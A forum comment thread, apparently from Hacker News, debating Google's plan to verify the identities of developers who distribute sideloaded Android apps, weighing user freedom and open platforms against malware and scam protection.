FWIW I'd rather not use my phone for critical transactions its making authorities lazy. The number of times Ive had to fight thanks to "buggy" payment code that deducts money is not funny and banks are getting worse at customer support day by day.
Also what the fuck are the governments doing with tax payer money, instead of going after criminals, we go after citizens.
If you think about it, the only thing that keeps this OS vendor in this duopolistic position is the fact that people rely on a certain proprietary apps. We need ways to do things like messaging and banking in a universal way, just like we can do with email, calls, texts and web. Banking and messaging should be fully universal so we don't rely on specific apps only available on specific app stores. That would take all power away from this satanic US companies!!!
Taking the article at face value, they'll have to register with google and have their apps be signed. Presumably this is subject to less review than the play store (eg. you don't have to justify your permissions list or whatever[1]), but there's no guarantees that developers will bother with the hassle. A lot of developers are willing to put some release up on github, but not dox themselves to google.
The only silver lining I see is if it allows you to bypass this by enabling dev mode on your phone. If you can't sideload unverified apps even in dev mode, that would be insanely bad.
IF that is the case, I'm actually willing to be slightly inclined to see this as a positive? We should normalize installing apps outside of Google Play, but that means malware becomes a serious issue with people downloading and installing random APKs.
e.g., this may normalize people hosting downloadable APKs whilst also reducing malware risk for "normies", which idealistically could weaken the "monopoly" of Google Play on android.
This is crazy, this means 10 years from now only terrorists will distribute software. Unacceptable! How many platforms now allow one to build and distribute a binary?
Only Linux, BSD and other operating systems that are entirely Open Source.
Even Windows has scary warnings now that pop up unless you pay several hundred dollars a year plus you have to go through a completely unreasonable process (that often requires being shipped a physical USB device) just to sign your application.
If you maintain it as a hard fork, why not? New phones technical specifications improvements are diminishing last few years anyway. As long as it works, it can last for many years to come. The question is only in the project budget, I think.
Time to move to a dumb phone, I guess. Android is slowly becoming worst of both worlds, none of the privacy features of iOS yet walls of the garden keeps getting higher.
Hmm this is weird. I've recently been considering switch back to Android because of how locked down ios is and it sounds like Google's now gonna do the same thing? Will there be a way to deactivate this?
This was probably the reason Nokia died. Symbian development, already cumbersome and app deployment required some such procedure. I remember there was an joint effort in a china based forum and many of us got a cert and a key for our phones. I was reading Nokia obituaries from its executives and the sorry state of Symbian development and app deployment was not considered as a cause. So here it, is young executives repeating a simplistic and destructive strategy. ibm, xerox, nokia and intel will be very proud.
The better alternative? Dunno. An alternative is iPhone and just take some of the benefits that comes with it. It's been a much more closed ecosystem from the start, but it's owned it. Google had a competitive advantage over that but they seem intent on throwing those advantages away with no foreseeable other upsides.
In development, working on completely other problem spaces to mobile development at all. It's not 2012 anymore and there are other noteworthy growth areas to spend time on.
But one think in the short term was tonight I just spent some hours migrating registered accounts away using a Gmail account to Proton.
One thing that annoys me is that a lot of F-Droid apps are obviously naive ports with overbroad permissions like "can read the entirety of storage", but that's still better than the all-consuming Goo.
The are apk's floating around from the Ice Cream Sundae days where the developer went out of business and is no longer on Play Store and this is literally the only way to run the app.
I have a Concept2 rower with the old PM3 monitor which is no longer supported by their ErgData app and the only way to connect my phone to my rower is by sideloading the ancient version of the app that supports it. So that's going to break now?
Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
Now there's also no more sideloading, so what purpose does Android even serve anymore?
>GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
The comment in the thread you linked directly contradicts the claim that "bootloader unlocking will also go away".
Exactly, the only reason to be a weirdo and have android in the first place was because there's so many good apps available outside the play store, if they lock it down just like Apple then what's the point?
Can you download, build, and install a basic Android system these days without touching a single piece of closed code? Absolutely. Will it be able to do much without closed binaries? No.
Android isn't GNU/Linux where there's a general ethos of making everything in userland FOSS if at all possible. Rather, it's a free OS that both Google and manufacturers can do anything they want with, including shove a ton of spy and bloatware on it, then make it to where you can't get rid of those things, at least not easily.
The optimism from 15 years ago surrounding FOSS in the mobile space is on its deathbed.
> iOS devices [..] have much less data collection than stock Android
iOS does a tremendous amount of data collection including for the usage of ads as per Apple's privacy policy. All the same types of data that stock Android collects, even.
You may believe Apple is a generally better steward of that data than Google, but using iOS does not reduce the amount of data being hoovered up in any meaningful capacity.
> Now there's also no more sideloading, so what purpose does Android even serve anymore?
I hate this change, but I still prefer Android. iOS is hardly perfect nor does it do everything better...
> Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
Because Google-free AOSP-derived Android distributions are far more versatile, offer far more freedom, impose far fewer restrictions and tend to end up being far less expensive than whatever the fruit factory decides their dedicants have to use today. If Google goes the way of the fruit folks and AOSP no longer offers these freedoms the next step is not to surrender to the Church of Apple but to find a way to evade those restrictions.
One of the reasons I switched to Android was the freedom to make apks for my phone and not dealing with certificates, expiry dates, Google's approval, etc.
This is a depressing change if they follow through with this.
And "in the name of security" doesn't pass the smell test if there is no way to opt out.
Well that sucks. So basically all the money weve had taken from us for our play store apps is now "just" going to be spent on administering the registration details of 800 million chinese developers and 6 billion bot accounts.
These companies need to be destroyed by antitrust violations. I am so tired of these tech companies abusing their market position. I want the FTC to stop being toothless and useless and just absolutely crush these companies. The amount of disdain I have for these companies can't even be properly expressed.
These companies are in bed with the government, you're not going to be saved by any legislation. Many people on this site supported Google censoring the Covid anti-vax idiots, but it should have made it very clear that Google was working at the behest of the government. They're in bed together; the government gets to do an end-run around the constitution, and Google gets to rely on special government privileges and protection. Win-win.
These corpos are part of the government, more or less, and they simply implement the edict to get rid of privacy. Not only in America. Smartphones have become eyes of the govs, while the Internet - something akin to their neural system. What's more interesting is why the govs feel so paranoidal and insecure recently? What are they afraid of?
The desire for people to keep using their currently working devices just got much bigger, and yet another good reason to root.
The infamous Franklin quote always comes to mind when I see things like this happening. Choose freedom over security while you still can, or you'll soon not even have the freedom to choose.
It's also worth reading Stallman's "Right to Read" again, to see how scarily prescient he was.
Before quickly running to dismiss this move, please at least do your research with regards to the situation in the countries mentioned in the article, especially Singapore and Thailand.
Side-loaded malware has been an epidemic in SE Asia, and there are MILLIONS of dollars stolen (mostly from pensioners!) via side-loaded malware disguised as gambling apps - the local population is particularly suspectible to gambling, especially the older generations that are not so tech-savvy.
So make it an unlockable feature with a big red warning saying something like: 'If you unlock this feature, your money might be stolen, malware could infiltrate your system. You take full responsibility and acknowledge that you are tech-savvy.'
I'm sure if my grandma saw something like that, she wouldn't click it. This way, people who want to stay in a closed garden are protected, while those who want full control have it. The current implementation seems designed for state interests, not the people's.
It shouldn't be impossible. Not every FOSS developer will want to register, or be mature enough, or may be from sanctioned countries, and so forth.
Private app companies should be and are doing more to protect against malware.
Banking apps in Malaysia are required to include malware detection software [0]. Companies should have better fraud and trust teams to identity and block fraud activities.
The rest of the world shouldn't suffer because a handful of banking companies refuse to offer basic fraud protections for their users.
The requirement per Google's post is rolling out globally though in a couple years. There was nothing stopping per country governments that this may disproportionately affect from requiring this for Play Protect/GMS certified Android devices sold in their region but enforcing it worldwide for such non-AOSP devices I don't find surprising to be controversial.
Brave of you to say this. Yeah, in my humble opinion, agree with you, android and ios devices target the mainstream users more than say a PC or Mac's, and should be more locked down. We can keep PC's and Mac's relative open (although they are getting more secure too, which might be good?), but for devices that truly target the masses, secure them as much as possible (why would typical users like my parent's need to install a remote access server on their phone?).
Yeah, my Dad got hacked only a month ago, through a tech-support phishing phone-call. He uses a windows PC which makes him vulnerable, and the scammers did install tons of evil crap. He really should be using an android or ios tablet, to reduce his chances of being hacked like this. I know these devices are still vulnerable, but they do seem more secure based on how much more locked down they are.
Android is getting more closed and iOS more open, I expect more people dissatisfied from both camps. We’ll have less choice overall as they gravitate towards a common middle ground.
Never heard of DUNS. It seems to be a US company *Dun & Bradstreet) that provides business intelligence.
It seems kind of odd to me to rely on some kind of external hidden "credit agency"-style company for this? And why would DUNS want to know about some kid in their basement in Bangledesh making (non-malicious) apps, and why would the kid want Dun & Bradstreet to know about them? It makes no sense at all.
They're trying to control malware. Tying apps that may be malicious to an identity that takes some degree of cost and effort to establish seems sensible in that light.
It's not that the identity prevents malware/abuse, but publishing any malware to the store burns the identity and establishing another is harder than simply coming up with a new email address. It's not necessarily the best scheme out of there, but it makes sense given their apparent goal.
Yeah, basically this is the rise of computer-credit agencies.
Youc an see the zeitgeist forming around corporations wanting to lock out any small unlicensed company from working on phones.
The key is mostly fascism in the guise of "security". Witness stuff like the ICE tracker app. Google would love a way to freeze out both it's appearance on the app store and any developer who'd program similar.
FWIW I got a DUNS number through apple as a single developer for a corp. It was super easy. If you've already gone through the trouble of setting up a corp, getting the DUNS is trivial by comparison.
Yes. You gotta pay your 100 bucks, but I don't remember feeling like my privacy was being invaded when getting a developer account. I assume the best reason they have for this is that they can nuke the account, effectively killing the install base of an app is reported to be malicious. Unless someone tells me why I should, I don't have a huge issue with this.
For me the difference is that Android is an open-source operating system. It sold itself and differentiated itself to users, developers and phone manufacturers as an open ecosystem built on open-source foundations.
Over the years, it seems Google has been trying to have their cake and eat it too, by basically subsuming others to use Android through this appeal of a more free and open operating system ecosystem, but have tried to slowly close and close it down now that it has won the other half of the market on that promise.
This feels more sly, because it's kind of a bait and switch. Apple never made such claim and was always upfront, so while I don't like it, I never bought into it in the first place for them to have the rug pulled under me after giving them my money as Google might be doing.
Most Android apps are crapware anyways. The only respectful apps that I know are open-source, and are being kicked out the of play store progressively.
I saw this coming a mile away. Everyone said you could install whatever you wanted on Android, but you were always jumping through some crazy hoops to do so. (compared to a general propose computer)
This would affect a lot apps that are not on the Play Store for multiple reasons... and if I'm going to be stuck with what Google thinks I should be allowed to use, then why not use iOS instead? At least software updates would be better and the overall experience more polished.
"A recent analysis by the company found that there are “over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.”
Ok, but what's the real damage? In other words, how many installs and how much money siphoned from users and legit apps?
Apple and Google are now competing on being more closed, rather than on being more open. Perhaps because we gave Apple a free pass on curbing our freedoms, and even defended its actions as needed for 'security'
He was unable to suggest any pragmatic alternatives. He just said "I don't own a smartphone", ignoring the fact that many people become very disadvantaged without one.
The real heroes are the people that facilitate alternatives, not those who talk.
Stallman is probably in the top 10 of all time in terms of people who facilitated alternatives to this. He invented the GPL and wrote and maintained a ton of tools for people running alternative software stacks to use. What more would you ask for?
>I know quite some people who live this way, and are very willing to overcome inconvenient hurdles to avoid having to use such a spying device.
This is kind of a lazy approach, and it's a good thing Stallman did not have that attitude towards personal computers.
But it's a bummer that there's no real equivalent for mobile devices. I use an Android device and I already consider it to be more locked down than Windows. Generally more irritating than Windows as well (maybe not Windows 11)
I also use it as little as possible (unfortunately more and more things require it) and try to get the smallest functional (for me) Android devices.
There are alternatives, using them involves sacrifices though, and there the modem baseband isn't replaceable yet. Take a look at GrapheneOS, F-Droid, Replicant, Purism Librem, PinePhone, PostmarketOS, PureOS, Mobian etc.
Okay, let's say you just became an enlightened person who understands that the current state of things need to be fixed.
To actually free yourself requires both commitment on your end and work on other people's end, those people who help facilitate alternatives and guide others to having more freedom and privacy. We need more of that work.
The speakers of the world have their place, of course, but that's not the most important part of the solution.
> To actually free yourself requires both commitment on your end and work on other people's end, those people who help facilitate alternatives and guide others to having more freedom and privacy. We need more of that work.
Such people both lead by example, and try to inspire others towards following their example/lifestyle. The problem rather is that most people want a different lifestyle (in the particular example of privacy and freedom "one with less radical consequences", which I consider to be rather contradictory, but this discussion shall be off topic).
To give an analogue: many vegetarians both lead by example, and inspire others to become vegetarians. But many people nevertheless don't want to become vegetarians.
When I switched from Android to iOS, this was one of the things I missed a lot: the ability to write my own app and side load it on my phone. Even more so with the advent of LLM. Oh well, now I don't have to worry about that.
Governments are scurred the internet has made everyone realize their governments are crap, their history is gibberish, and it's all being used to screw the next generation. So 60+ year olds are falling back on old tropes
TikTok is "brain rot" even though the real economy runs on physical statistics, the semantics have to be recognizable to the elders, or it's not democratic so they will force the semantics to be regurgitated as-if they are religious catechism.
The Internet is the most powerful propaganda distributing system that humanity has ever come up with. Autocracies love the Internet, or at least the ones that see the writing on the wall. We have the sum total knowledge of the entire human race within a few clicks and we mostly use it to find videos to be mad at. We are our own jailors.
It's easy. For the average user, device integrity is more valuable (by a lot) than side loading.
People that think this is unacceptable are not remotely average users. Average users benefit greatly from their pocket appliance not being a full fledged computer.
Ultimate control over devices you own should be a basic right. Apple's wanton abuse of users and developers via the control they have over their platform, and Google's nipping at their heels, should be evidence enough of that.
Fundamentally, it is a trust issue. Why should I be forced to trust Google or Apple has my best interests in mind (they don't)? That is not ensuring 'device integrity', it's ensuring that I am at the whims of a corporation which doesn't care about me and will leverage what it can to extract as much blood as it can from me. You can ensure 'device integrity' without putting any permanent trust in Google or Apple.
That was intended to be a generic 'device manufacturer', not calling out Google and Apple specifically. It's my device. I should control it, full stop. It should simply not be legal for a device manufacturer to lock me out of a device I own, post sale. In the past it wasn't _possible_, so we didn't need to worry about it. But now the tech is at the point where manufacturers can create digital locks which simply cannot be broken, and give them full control of devices they sell (ie. which they no longer own), which are being used in anti-consumer ways.
Considering market forces are against it, I believe the only practical way to accomplish this in the long term is for this to be a right that is enforced by legislation. I don't think it is even far from precedent surrounding first sale doctrine and things like Magnuson-Moss, that the user should be the ultimate one in control post-purchase, it just takes a different shape when we're talking about computing technology.
You are forced to trust Google or Apple if you want a smartphone. They own the whole market, it's a duopoly. You already have no power to install an OS without such limitations on most smartphones.
Limitations because it's not just protection - you don't get to choose which authorities you trust. Defaulting to manufacturer/OS vendor as the default authority would be ok, but there is no option to choose. Users have no power over their own device. That's not ok even if most choose to never execute it or don't know about it, it will lead to abuse of power.
Modern life without either of these OS (or like a phone number) is pretty difficult, i.e. you can't charge your car or access e-government without an app.
why do you think you have any say over others' rights? using that same logic, you know what? i think you're going to steal my phone. so do you mind if i sacrifice your rights and install a camera right in your room? wouldn't want you to plot the theft of my phone now would i
Id argue that the average user is not a good barometer. They are okay with slowly being boiled alive. See windows 11 as a good example.
What's being sacrificed in the name of security is not worth it imo.
Enabling side loading on android is not a standard setting you can flick on. Is there any data on the number of devices who have this enabled and are falling for hacked apps?
I might partially agree, but the market already has a fantastic, secure option for those users: Apple.
Android's value was always in being the open(ish) alternative. When we lose that choice and the whole world adopts one philosophy, the ecosystem becomes brittle.
We saw this with the Bell monopoly, which held up telephone innovation for three quarters of a century.
In the short term, some users are safer. In the medium term, all users suffer from the lack of competition and innovation that a duopoly of walled gardens will create.
They're happy in their walled garden, until they don't and discover there is a wall they now can't overcome and learn whose hardware it really is
I do think it is in everyone's interest to be able to run software of your choosing on hardware you bought to own. The manufacturer needn't make it easy (my microwave sure didn't expect to install extra software packages; I don't expect them to open up an interface for this) but they also don't need to actively block the device owner from doing it
Bro, you forbade exactly the reason this is good for average users. Average users get emails that say:
> you have been infected by 3 viruses, click here in the next 5 minutes or the damage will be permanent
And they believe it. Giving them the power to run any software they want, also means giving everyone else the power to make them run any software they can be tricked into installing.
I'm deeply concerned about how this will impact users like us, especially since we're such a small minority that our desires could easily be trampled by the masses, but this is a clear win for the average user.
(And don't make the perfectionist fallacy w.r.t. Google not successfully preventing 100% of malware)
In the short term, yes. In the long term, it means Google can ban any app it doesn't like, and it means governments can compel it to do so.
Governments being able to ban software without easy workarounds could have far-reaching consequences affecting people who don't even use the software in question. This is a Bad Thing even if it helps keep a few people from getting scammed.
Damn we should just give up on this whole computer thing outright then, seems pretty dangerous. There are plenty of other things we could strip away that would make people much safer than just installing software, that's thinking small!
Stripping away computers entirely would have significant negative impacts. For the *average user*, preventing them from side-loading unsigned apps will have no negative impact.
For now, maybe. Like all discussions on freedoms and rights it's usually not about the day to day impact or the average person, if we optimized for the average person, we'd be in a sorry state.
Two reasons: they are not educated about devices they use, desktop operating systems are still awful at security (exe from a mail attachment can have a pdf looking thumbnail, executed with two clicks, even if accidental, immediately gets access to all user files... the whole concept of antivirus software...). It has nothing to do with side loading, especially on Android, where sideloading is a very explicit action already, and then you need to allow the application to do harm.
> Giving them the power to run any software they want, also means giving everyone else the power to make them run any software they can be tricked into installing.
You are taking away people's agency. Either you get to control your bank account risking that you get scammed, or someone will control it for you.
> very explicit action already, and then you need to allow the application to do harm.
So the email they get which tells them about the 3 viruses also contains a phone number where a "nice tech support person" will walk them through the steps of side-loading the "anti-virus app". You'd be surprised at what warnings/permission boxes people will blindly accept when they think they're talking to someone from Microsoft or Google's tech support.
> You are taking away people's agency.
Agency they don't want and never use. It's taking away agency from people like us but for the average user, Google is taking away nothing they've ever cared about.
> Either you get to control your bank account risking that you get scammed, or someone will control it for you.
I was just saying a couple of days ago that we need a service for old people where any transaction above a certain configurable threshold (for example, $500 in a day) has to be approved by an employee of this service who serves as a neutral 3rd party whose sole function is to try to prevent scams. That way the old folks would still have their agency so they can go out and buy all the hot-rods and transistor radios they want but if they're about to wire money to "Microsoft" then the anti-scam-company would step in and prevent that transaction (or at least require the old person have a discussion about why its an obvious scam first before eventually allowing the transaction through depending on the client).
Whether this change actually takes control away from us remains to be seen. For example, I don't see anything in the article that suggests we wouldn't be able to install a custom ROM with the signature check removed. Personally, I already run GrapheneOS so I expect I actually won't be impacted by this at all.
Agreed. Most people don't care that they can't run "unauthorized app XYZ", as long as their bank account / vacation pics / texts don't leak.
Now, that may happen anyway, but they'll give up a TON to avoid that.
Me, I try to avoid using my phone for anything important, use a VPN under Linux at home whenever possible, ad blockers, privacy guard, etc, etc. I can't expect my non-technical family members to do that.
Bad car analogy coming up: MOST drivers benefit more from ABS than the few really, really good race car drivers who can do threshold braking and outbrake ABS - and even then, I doubt it's true for anything but the earliest ABS systems. I'll bet the newest ABS systems are better than almost any human - because they don't have an off day, don't get distracted, etc.
And I get the anger - I'm an old school Atari 800xl / ST / DOS / Linux user who tries to ditch Windows where possible. Restricting things seems heavy-handed - and I don't trust Google in the least. But I would NEVER tell anyone in my family to sideload an app, even though they're all Android users - I don't want that support burden.
And people who are financially interested in letting users side-load apps (malicious or otherwise) are good at what they do. I mean, even Russian banks that are banned from the Apple App Store are still finding ways to distribute iPhone apps.
> Average users benefit greatly from their pocket appliance not being a full fledged computer.
Why, though?
There's certainly no technical reason that a pocket appliance can't be a full fledged computer. The primary reason it isn't is because device manufacturers benefit greatly from having a tight control over their products. This is not unique to mobile devices; we see the same trend of desktop operating systems becoming increasingly user hostile as well.
The claim that these features are in the best interest of users is an inane excuse. Operating systems can certainly give users the freedom to use their devices to their full capabilities, without sacrificing their security or privacy. There are many ways that Google could implement this that doesn't involve being the global authority over which apps users are allowed to install. But, of course, they are in the advertising business, where all data that can be collected, must be collected.
Don't pretend that average users are asked, or that their opinions would matter. Or even that you have some sort of insight into the average user that other people don't have.
People who think this is unacceptable are the people who 1) understand what it is, 2) don't stand to profit from it, and 3) don't dream about locking average users into an ecosystem that they control some day.
This seems like the only sensible long-term solution to me unless anyone else has an alternative. AOSP public access is already on the chopping block, custom ROMs are the short term solution but still operate at Google's whim under the hood.
It seems that it was only about time… it just feels like the pace of enshittification with big tech being able to get away with anything is crazy!
I’m hoping that projects like Precursor can take off because we’ve buried ourselves in such mountain of complexity that seems like only a billion/trillion dollar big tech company can make an OS.
But then again, some body called BS on browsers and we might have a good option soon in Ladybug!
I rely on an open source app called xDrip to manage my diabetes. It's way way way better than any of the official apps. It's not distributed on the app stores for obvious reasons. Many others rely on this app as well. Are we cooked?
China will push own Android OS forks into other markets even harder, if they do it fully open-source then bonus for them, users will force devs (banking apps etc) to get more support. A good example is one EU bank which publishes to Huawei's AppGallery to support non-Google certified Android phones.
making an ADB-based debloater and browser shims to use stuff like bank apps, then sharing that with others. Then again, like cutting wires, it doesn't address the root cause.
"Google to prevent users from installing programs on Android phones."
This might do more good than harm, since I'm willing to believe that scams involving APKs are prevalent, but come on. I need your permission to install software on my phone? Are you sure it isn't just that you want more control over everyone's phones?
Everybody complaining of this is admitting they are doing nefarious actions. Those of us playing by the rules see no issue with this - In fact I welcome it!
> Starting next year, Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store.
Odd little phrase, "distributing their apps on Android devices".
I think "distributing" in this context is in the sense of product distribution, not in the sense of distributed systems.
But "distributing...on" sounds a little odd, like Google is still providing a distribution service. (Contrary to all the precedent of how we've thought of installing software, other than the proprietary, captive-user app stores.)
And so, maybe "distributing...on" makes it sound more like Google is (once again) entitled to gatekeep what you can run on your device/computer.
> However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option. Google says this will help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users’ personal data.
Maybe it's not "developers who appreciated the anonymity" (which we immediately try to conflate with bad actors), but that the whole point lately has been to stop the greedy proprietary lock-in app store monopolies, and not have them gatekeeping what everyone else can do.
"Distribute on" sounds odd because it's incorrect. APKs are not distributed by putting them on phones and carrying the phones from one place to another. "Distribute to" would be more correct; better yet, "develop for".
This is another "beginning of the end." All eyes are on this situation and how much push back it gets. If there is little resistance, others will certainly follow suit.
Another instalment of HN thread where people try their best to pretend that "security" does not come with "enforced, ideally at hardware level, inability to run random code" for 99% of phone users.
Here a tip: you won't solve the problem of security by just whining about corporate interests (which is a real concern) and NOT proposing a better solution that works for an average tech illiterate, very socially engineerable person trained to ignore every warning screen. And no root switch is not that solution because it will be flipped on day 1.
> Google is explicit today about how “developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer.”
« Développer will have freedom » yet they are entitled to Google’s verification.
It’s just another stone in the grave of Android and even though I shipped off this sinking ship 6 years ago to iOS, this is still concerning because ultimately apple’s IOS is in competition solely with Android.
If Android gets so bad it has all the disadvantage of iOS, some more, for instance with the embedded spyware that manufacturer are paid to include, and none of the good side of iOS, then everyone lose. Apple doesn’t have to compete anymore, they just have to not suck.
Without an apple ID you can compile an iOS app, but can only run it in an iPhone Simulator on a Mac.
With a free apple ID (no additional registration needed) you can also install your compiled iOS app on your iPhone and have it working for 7 days before you need to re-install it.
Is it really different from what Google is doing ? Not being to compile or user not being to install have the very same consequence : your app can’t be used.
This will be just another boost for de-googled phones, alternative platforms and potentially Mobile Linux.
The only reason why google phones became so popular was the fact that they were much less restrictive than iPhones. Thus the platform became the biggest phone platform in the world.
Now they are asking for a new start to arise and take their place.
Sorry, folks, the good times are over. The future of computing is a signed, attested chain of trust from boot firmware through application code, on all platforms people are likely to use -- and remote attestation with user identification if you wish to connect to the network. End users love it because it prevents or reduces all sorts of malicious activity, from bank fraud down to online game cheating, with little to no effort on their part; platform vendors love it because it provides a moat; service providers (banks and such) love it for the assurance that their clients are uncompromised; and governments love it because it lets them surveil users and developers.
The only ones who hate it are devs. And who really cares about a bunch of nerds?
Remember, general purpose computing really boils down in security terms to "arbitrary code execution" -- a bad thing in the infosec field.
If this goes through, would it be possible to see a consumer class-action lawsuit? I imagine there is a class of people for whom the sideloading of apps is necessary and removing it renders their phone almost useless. I'd also guess that this market is much larger than Google imagines.
Personally, if I'm not allowed to run the software that I want on my phone, it almost makes more sense for me to get some old flip phone or one of those chinese blackberry knockoffs c.a. 2012. Not out of any principled stance, mind you, it's just that's the level of functionality you'd be reducing me to. Why should I pay $500 when I can find something that gives me the same features on a literal junk pile?
It is. Notarization like Apple does is also legal. In fact the EU commission would welcome this with open arms since they can now access the personal data of every developer and can order Google to ban every app they want. This goes hand-in-hand with their new "Digital wallet" app that will be launched next year.
This combined with the 'age verification' coming to all Google properties means it is a very small step from that new world to full Google verification of everything you visit and everything on your device, at any time, for any reason with the penalty being incontestable ban from your device, apps and data.
Get ready for facebook style 'we are interrupting you for a video selfie because we have detected you are a threat' across all google properties (Android, Chrome, Gmail, Maps...).
This has the potential to be disastrous for Google, but maybe not.
Personally: I don't use Apple because I like being able to whip together little apps to side-load without having to check in with a walled-garden mothership. If Google is going to move closer to Apple in that regard... Apple's UX ecosystem is better, so I have far fewer reason to keep using Android.
I suspect this won't be disastrous for Google, because where will people care about this go? Apple, who is even more restrictive? This is just another in a long series of incidents showing why we desperately need a real alternative to the mobile duopoly. I would ditch Android over this, but there's no realistic alternative available to me.
I think the only thing hat can save us is a jailbreak. Either for iOS or Android to let you sideload apps.
Alternatively, and that’s almost bullshit, the dumb phone trend continues and we might get devices like PDAs. Get a dumb phone and a small camera and then your PDA for everything that is essentially an app. Not sure what OS they’d run but I don’t see another way.
Android also allows apps that can run arbitrary code, like emulators and various other runtimes. I think iOS still doesn't? I have not written an Android app in ages, other than at work, but I often write silly little things running in the Löve 2D Loader, or TIC-80, or DOSBox, or just command-line tools running in Termux (I hear there is an X-server as well to run GUI applications from Termux?).
As long as they still allow running stuff inside of apps like that I will probably not abandon ship yet.
They recently allowed emulators, like RetroArch, to be on the app store. They still require the emulators to be written in Swift AFAIK. Still quite a bit more restrictive than Android, but they have slowly been opening up.
This phase from the last couple of years just had to come - and while it's painful to be exposed to it - it seems highly illogical for us to complain and cry about it.
- "Free" search - yay, let's all use it for everything and even make a verb out of it
- Email - such nice guys, Google - free email forever, what could go wrong if I have my 95% of all my info there
- Maps - yeah, let's all depend on these free Google maps with our lives
- Chrome - ofc, heck yes, let's all use their browser, it's the best and free - no need for anything else
- Google account login for EVERYTHING - so convenient! Google Authenticator app, Google Wallet - yes, more!
- Free mobile operating system - nice, take that, Apple!
Google has taken over a large portion of our lives, step by step - good enough services, on global scale, for free, until they became essential.
They are not evil, like they were never good - they are a company, and in the current socio-economic structure, that means having a duty to use their position to enrich their shareholders - and absolutely have no interest in people's wellbeing or morality or opinions or reputation - unless it temporarily serves to do so more / better.
I'm in no way trying to defend them. Just, with all the futility of it, pointing out how hyper-capitalism we've built/allowed to grow, has reached the stage where it's practically impossible for the "free market" to react / provide solutions that people want. Now the big players decide what people get.
In this case, you can no longer have a high quality phone of a good manufacturer and install on it what you want. Small manufacturer catering to that demographic won't get government certification, you can't have your e.g. Samsung and install a ROM anymore, and you can't install your app freely on Android unless Google lets you. That's all just in a tiny sliver of space.
Our Tetris board barely has any room left for choice and actions.
Dick move. Go back to "do no evil" big G. Remember how you used to be the kool kid on the block? Now you've just become the grown up you showed contempt for in your prime time.
I doubt I'll move away from Android too soon, but that definitely makes me reconsider whether any Google services have a right to CPU time on my device.
I don't understand, when the EU announced that Apples "actually we need to sign all of these and pay us" requirement is illegal, Google was like "hold my beer"?
Could someone explain why the personal privacy of software developers is more important than the cybersecurity of consumers and nations please and thank you
Google is really turning into a dystopian company, destroying any goodwill their virtuous employees created in the past. It feels like they are primed to be the main turnkey tyranny facilitators.
Anyone even remotely privacy or security conscious needs to vote with their wallet in protest and stop buying Android phones, otherwise it's only a matter of time 'til Google bans side-loading and it becomes impossible to buy a phone that can run any kind of anonymous or end-to-end encrypted communication software.
Stop buying Android and what? Buy an iPhone that's even more locked down or live like an outcast that can't access essential services? Because those are the realistic options.
For years I've been buying middle-of-the-road Android phones because they provide pretty good bang for the buck, but if I can't use a computer I paid for however the fuck I want, I'm just going to start getting the cheapest crap I can get away with and use it as little as possible. "Vote with your wallet" doesn't have to mean total abstinence.
I think getting a flagship device that's a few years old probably makes for a better experience. I check the LineageOS supported devices list, then search eBay for something from there.
Flip phones can access essential services just fine, if some business or government office is only allowing something to be done via smartphone app, that’s a problem.
Do you not have to use a 2FA app for things like banking? In Singapore, they are phasing out 2FA options other than the banking app. The banking apps only work on iPhones and Google-approved Android phones. It's pretty bad.
in all things. I would encourage you and everyone who reads this post to stare down this option with realistic consideration. In a society this broken, it is the solution to more and more things. To checkout, to accept the hard mode because to pick the path of convenience is to be exploited.
I respect at least your choice but I'm not growing tofu on the farm. Veganism is one of those protests that while i appreciate going after factory farms, you're only enabled to do so by large corporations.
In your country, maybe. Over here you're dead in the water without a smartphone — can't access banking except by going to the branch and standing in the queue for an hour or two, can't access most government services. Limit your selection of goods (like electronics, but not only that) by something like 90% (and also increase prices by 30-50%) because brick and mortar shops sell old crap at much higher cost than it was ever worth, and the only real solution is buying from a major marketplace which is only available as a mobile application.
This concept originated in China and is spreading. Beware.
@achrono (I cannot reply to the other post, I don't know why). Yes, you can use just a web browser.
> Mobile Payments
They work with a card, no smartphone required. Moreover, cash didn't cease to exist.
> Navigation
Again, physical maps are a thing. Google Maps or OpenStreetMap are accessible by browser. Having a physical map and having to follow road signs can be a beautiful experience. If one is addicted to a machine that tells them where to go, navigators are still a thing (no smartphone required)
>All manner of IoT devices
Don't put an IoT device in your house if you don't know what it does and how it works. If the only way to interface to it is via an app... then you don't know what it does and how it works. Don't put it in your house.
>Wearables
I don't even know what are wearables: if I write it on Firefox it underlines it in red. By doing a quick search, I can see images of watches. Watches can work without an app. Moreover, watches that work without an app are usually less expensive than the other kind.
>Digital versions of ID (Mobile Passport Control)
Don't. I know that some governments are pushing this crap thinking it's the future. Simply don't. Imagine you're at the airport and you accidentally drop your passport. You pick it up, nothing lost. Imagine you drop your phone and it stops working. You lost:
- Your documents
- Your money (if you rely on your phone for paying and don't have cash with you, which seems a growing trend among people I know)
- All your ways to contact people for help
Instead:
- Your wallet is stolen: you lost all your money and your cards, but you have your documents (at least the passport because it surely does not fit a wallet).
- Your phone is stolen: you lost all the ways to contact people, but you can buy another one
- Your passport is stolen: you can contact your embassy.
Smartphones are becoming a SPOF (Single Point Of Failure) for our lives.
Are you for real? I'm totally on board with using free and open alternatives, but if you're not going on a mountain trail then a physical map is going to be drastically worse than any navigation software.
Also FWIW I have a card-sized passport that I can easily get stolen with my wallet.
But, and I hesitate to point it out, because I am finding that people think it is somehow minimal entry stakes, one does not need any of those things..
You wouldn't get very far without WeChat and AliPay in China. Last time a good friend of mine was there, many merchants simply refused to accept cash. The few that did had made it known how much they were inconvenienced by doing that.
Same for basically every interaction with locals, for accessing government services, or even just using the public transportation.
It's pretty similar for locals AFAIK.
And before anyone replies that he didn't have to travel there — no, he did, unless he was willing to look for another job (which are very sparse here, you hold on to a good job for dear life).
He's talking about concert tickets and similar entertainment events, where several of the major providers no longer provide PDF tickets and instead only send them to a phone app. It is possible to make enough of a stink and collect tickets on the day, but that option is increasingly difficult to find.
